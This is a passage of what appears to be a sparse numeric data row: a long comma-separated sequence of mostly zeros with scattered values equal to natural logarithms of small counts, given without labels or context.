0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.044522437723423, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.2237778411112, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.833213344056216, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.143134726391533, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.219507705176107, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 4.219507705176107, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0, 0, 0.0, 0.0, 3.4011973816621555, 0, 3.3322045101752034, 0, 2.8903717578961645, 0, 0, 0.0, 0, 0.0, 3.2188758248682006, 0, 1.791759469228055, 0, 0.0, 4.394449154672439, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 3.295836866004329, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.295836866004329, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0, 0.0, 1.6094379124341003, 0, 0.0, 0.0, 0.0, 2.6390573296152584, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.58351893845611, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 5.655991810819852, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 5.03709614637473, 0.0, 0, 2.772588722239781, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4657359027997265, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.931825632724326, 0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.1354942159291497, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.9459101490553132, 0.0, 0.0, 2.0794415416798357, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.4011973816621555, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 10.484135188312965, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.833213344056216, 0.0, 5.030437921392435, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8903717578961645, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.649511027115099, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 3.649511027115099, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 2.995732273553991, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 3.0841946160253872, 0, 0.0, 2.0794415416798357, 0.0, 0.0, 4.518263445217986, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 2.8903717578961645, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 